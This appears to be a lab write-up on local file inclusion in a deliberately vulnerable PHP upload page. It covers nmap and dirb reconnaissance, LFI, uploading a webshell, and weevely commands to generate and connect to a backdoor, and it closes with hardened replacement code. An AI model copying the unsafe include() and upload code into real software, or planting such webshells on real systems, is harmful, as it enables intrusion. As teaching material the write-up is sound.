LFI
===

Setup:

1. install xampp

![](https://i.imgur.com/HqZMyv7.png)

https://www.apachefriends.org/zh_tw/index.html

2. setting httpd.conf

![](https://i.imgur.com/1Ch6Tvh.png)

In httpd.conf, set `ServerName Localhost:port` and `Listen port`.

![](https://i.imgur.com/jCUawIi.png)
![](https://i.imgur.com/XmafLqk.png)

Change `AllowOverride` to `All`.

![](https://i.imgur.com/sCYQ2Dq.png)

### source

index.html

```html
<html><body>
<script language="javascript">
document.writeln("Have a good day.");
</script>
<form method="post" enctype="multipart/form-data" action="upload.php">
  <input type="file" name="my_file">
  <input type="submit" value="Upload">
</form>
</body></html>
```

upload.php

```php
<?php
# Check whether the file was uploaded successfully
if ($_FILES['my_file']['error'] === UPLOAD_ERR_OK){
  echo '檔案名稱: ' . $_FILES['my_file']['name'] . '<br/>';
  echo '檔案類型: ' . $_FILES['my_file']['type'] . '<br/>';
  echo '檔案大小: ' . ($_FILES['my_file']['size'] / 1024) . ' KB<br/>';
  echo '暫存名稱: ' . $_FILES['my_file']['tmp_name'] . '<br/>';

  # Check whether the file already exists
  if (file_exists('upload/' . $_FILES['my_file']['name'])){
    echo '檔案已存在。<br/>';
  } else {
    $file = $_FILES['my_file']['tmp_name'];
    $dest = 'upload/' . $_FILES['my_file']['name'];

    # Move the file to its destination (client-supplied name, no type check)
    move_uploaded_file($file, $dest);
  }
} else {
  echo '錯誤代碼:' . $_FILES['my_file']['error'] . '<br/>';
}

# LFI vulnerability (intentional for this lab): the request parameter goes straight to include()
echo '<br>(Prompt_lfi: File name passwd.txt )<br>';
$file = $_GET['path'];
include($file);
?>
```

3. set up web site

Technique:

1. nmap scan

> sudo nmap -sS -A -v [target]

After scanning the IP with nmap, we find the key information: Apache is running and port 8087 is open.

![](https://i.imgur.com/7meUami.png)

2. dirb web content

> dirb http://target/oo/XX/oo

![](https://i.imgur.com/D4hzWuk.png)

3. discovery

We find that there is another level, `apache`, under the `php` folder.

![](https://i.imgur.com/4VGeQXy.png)

The program seems to hit a problem when it runs, so let's try Local File Inclusion.

![](https://i.imgur.com/eh57OWU.png)

Scored successfully!!
4. upload webshell

dirb also found an `upload` directory one level below `apache`.

![](https://i.imgur.com/fVAgW7M.png)

Upload succeeded.

![](https://i.imgur.com/80Vrowu.png)

5. Tools

Generate:

> weevely generate [password] [output path]

Connect:

> weevely http://localhost/backdoor.php [password]

Original article: https://www.freebuf.com/sectool/117085.html?replytocom=
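
The lab's `upload.php` passes `$_GET['path']` straight to `include()` and saves uploads under their client-supplied name inside the web root, which is why both the file read and the webshell upload work. The following is an added example, not code from the original notes, showing a hardened form of both spots. The directory constants, the two allowlists and the helper names `resolve_page` and `store_upload` are assumptions made for illustration, and PHP's fileinfo extension is assumed to be enabled.

```php
<?php
// Added example, not the lab's code. Directory names, allowlists and helper
// names are assumptions; the fileinfo extension is assumed to be enabled.
const PAGES_DIR     = __DIR__ . '/pages';              // only includable files live here
const UPLOAD_DIR    = __DIR__ . '/../uploads_private'; // outside the web root
const ALLOWED_PAGES = ['passwd' => 'passwd.txt', 'about' => 'about.txt'];
const ALLOWED_MIME  = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

// Map a request key to a fixed file name; the raw value never becomes a path.
function resolve_page(string $key): ?string {
    $file = ALLOWED_PAGES[$key] ?? null;
    $base = realpath(PAGES_DIR);
    if ($file === null || $base === false) {
        return null;
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $file);
    // Defence in depth: the resolved path (symlinks followed) must stay inside PAGES_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return ($real !== false && strncmp($real, $prefix, strlen($prefix)) === 0) ? $real : null;
}

// Store an upload under a server-generated name, typed by content sniffing.
function store_upload(array $f): ?string {
    if (($f['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']); // ignore client-sent 'type'
    $ext  = is_string($mime) ? (ALLOWED_MIME[$mime] ?? null) : null;
    if ($ext === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext; // client file name is never used
    return move_uploaded_file($f['tmp_name'], UPLOAD_DIR . '/' . $name) ? $name : null;
}

if (isset($_FILES['my_file'])) {
    $saved = store_upload($_FILES['my_file']);
    echo $saved === null ? 'Upload rejected.<br/>' : 'Stored as ' . htmlspecialchars($saved) . '<br/>';
}
$key  = $_GET['path'] ?? '';
$page = is_string($key) ? resolve_page($key) : null;
if ($page !== null) {
    // readfile() streams the bytes; unlike include(), it never executes them as PHP.
    readfile($page);
}
```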